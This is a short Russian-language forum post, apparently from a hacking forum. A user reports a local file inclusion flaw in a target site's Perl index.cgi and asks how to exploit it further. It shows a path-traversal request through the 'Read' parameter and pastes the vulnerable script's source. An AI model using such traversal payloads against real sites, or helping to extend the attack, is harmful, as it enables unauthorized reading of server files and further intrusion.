16.08.2010, 07:11
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
Есть нужный сайт в корне лежит .htaccess со строкой
DirectoryIndex index.cgi
Сам index.cgi подвержен LFI через параметр Read (через который я его и прочитал), вопрос - что тут можно вытащить и можно ли в принципе. C Perl знаком посредственно. RFI не срабатывает.
LFI: site.com/?Read=../../.htaccess
index.cgi:
Код:
#!/usr/bin/perl use strict;
use Cricket::Interface::Form;
use Cricket::Interface::Template;
use Cricket::Base::Config;
#use Cricket::Base::Mail;
print "Content-type: text/html\n\n";
my($form) = Form->new();
#$form->print_it();
my($templ) = Template->instance();
my($cfg) = Config->instance();
$templ->param('Lang',$form->get('Lang')) if (uc $cfg->get('Template','MULTILANG') eq 'Y');
$templ->template($form->get('Read')) if ($form->get('Read'));
print $templ->parce();
exit 0;
Спасибо. |
|
|